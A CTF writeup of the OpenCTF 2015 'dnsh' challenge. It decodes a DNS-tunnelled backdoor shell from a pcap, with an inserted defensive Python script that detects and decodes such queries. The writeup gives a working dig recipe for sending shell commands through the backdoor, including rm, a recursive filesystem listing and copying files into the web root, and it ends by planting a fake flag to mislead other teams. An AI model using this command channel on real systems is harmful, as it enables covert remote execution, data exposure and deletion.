OpenCTF 2015 - dnsh (botnet,pwnable 100) Writeup

Hint:

dnsh 100 --- Our IDS picked up this CnC traffic - please ANALyze it - 172.16.18.20/dnsh-985199bc2d4d732db28f8ba1ccfc6702

The provided pcap contains an HTTP request that results in a 404, a bunch of weird DNS queries, followed by the same request that previously returned 404 now succeeding. Brute-force decoding reveals that the DNS queries are a back door shell. The DNS queries are of the form:

{Base32_encoded_command}.{Hex_representation_of_MD5_of_Base32_encoded_command}.goatse.cx

Decoding the queries in the pcap shows that the webserver files are in ~/www/files/:

cp /var/www/html/*.swf ~/.
mv *.swf ~/www/files/.
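The query-name format above is simple enough to decode and verify mechanically, which is what an IDS rule or a triage script should do with a capture like this one. The following Python is an added example (not part of the writeup and not Javantea's script): it parses query names of the form base32(command).md5hex(base32 label).goatse.cx, checks the MD5 label against the base32 label, decodes the command, and runs that over a few constructed query-log lines. The log-line shape (a BIND-style "query: <name>" field) and the sample lines are assumptions; the one real label used is the one shown later in the writeup.

```python
import base64
import binascii
import hashlib
import re

# Domain the dnsh backdoor beacons to, as observed in the challenge pcap.
C2_DOMAIN = "goatse.cx"

# A single DNS label holds at most 63 octets, which is why long commands had
# to be shortened in the writeup. The regex matches the documented layout:
#   <base32 command>.<32 hex chars: md5 of that base32 label>.goatse.cx
QNAME_RE = re.compile(
    r"^(?P<cmd>[A-Z2-7]{1,63})\.(?P<sum>[0-9a-f]{32})\."
    + re.escape(C2_DOMAIN) + r"\.?$",
    re.IGNORECASE,
)


def b32decode_unpadded(label):
    """Decode a base32 label whose '=' padding was dropped to fit in a DNS name."""
    label = label.upper()
    label += "=" * (-len(label) % 8)
    return base64.b32decode(label)


def decode_dnsh_qname(qname):
    """Return {"command": str or None, "checksum_ok": bool} for a dnsh-style
    query name, or None if the name does not match the format at all."""
    m = QNAME_RE.match(qname.strip())
    if not m:
        return None
    cmd_label, digest = m.group("cmd"), m.group("sum").lower()
    # DNS names are case-insensitive and a resolver may log the label in a
    # different case than the client sent it, so accept the digest of any
    # casing of the label rather than only the one seen in the log.
    accepted = {hashlib.md5(c.encode("ascii")).hexdigest()
                for c in (cmd_label, cmd_label.upper(), cmd_label.lower())}
    try:
        command = b32decode_unpadded(cmd_label).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        command = None  # not valid base32 of any length
    return {"command": command, "checksum_ok": digest in accepted}


# Field that carries the queried name in the assumed BIND-style log shape.
QUERY_RE = re.compile(r"query: (\S+)")


def scan_log(lines):
    """Run the decoder over query-log lines and return the hits with line numbers."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        q = QUERY_RE.search(line)
        if not q:
            continue
        result = decode_dnsh_qname(q.group(1))
        if result is not None:
            hits.append({"line": lineno, "qname": q.group(1), **result})
    return hits


# Constructed sample log: one benign query, one well-formed beacon using the
# base32 label shown in the writeup, and one beacon whose checksum is wrong.
_LABEL = "OJWSA7RPO53XOL3GNFWGK4ZPNYVA"
_GOOD = f"{_LABEL}.{hashlib.md5(_LABEL.encode()).hexdigest()}.{C2_DOMAIN}"
_BAD = f"{_LABEL}.{'0' * 32}.{C2_DOMAIN}"
SAMPLE_LOG = [
    "12-Aug-2015 09:10:01.101 client 10.10.53.5#41234: query: www.example.com IN A + (10.10.53.53)",
    f"12-Aug-2015 09:10:02.202 client 10.10.53.5#41235: query: {_GOOD} IN A + (10.10.53.53)",
    f"12-Aug-2015 09:10:03.303 client 10.10.53.5#41236: query: {_BAD} IN A + (10.10.53.53)",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        state = "ok " if hit["checksum_ok"] else "BAD"
        print(f"line {hit['line']}: checksum {state} command={hit['command']!r}")
```

A mismatched checksum is still worth alerting on: it most likely means the resolver changed the label's case or truncated it, not that the query is benign, so the scanner reports such hits with checksum_ok set to False instead of dropping them.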

A very quick and dirty script to push commands to the target server was written by Javantea:

dig @10.10.53.53 <base32 string>.$(echo -n <base32 string> |md5sum |head -c 32).goatse.cx

For instance, to run [rm ~/www/files/n*], a necessary step to remove all of our flag files after the challenge is completed, you can run the following command:

dig @10.10.53.53 OJWSA7RPO53XOL3GNFWGK4ZPNYVA.$(echo -n OJWSA7RPO53XOL3GNFWGK4ZPNYVA |md5sum |head -c 32).goatse.cx

The length limits on DNS names cause only a small amount of trouble. Unfortunately the flag doesn't seem to be in any obvious location near the CWD, so instead the whole filesystem is listed recursively into a file the web server can serve:

ls -alR / > www/files/neg9.txt

The flag was then found at /var/www/.hide/ctf_flag.txt. At this point we started hitting length limitations in our DNS queries, so a slightly creative command was written to shorten it:

cp /var/w*/.h*/c*.txt www/files/n

Requesting the n file from the web server revealed the key:

s0m3thing_Cl3veR_ab0u7_b0tn3ts_g03s_her3

This was followed by some light trolling to mess with any teams after us:

echo "th3_c@t_is_#1" > flag.txt

Posted on Aug. 12, 2015, 9:10 a.m. by reidb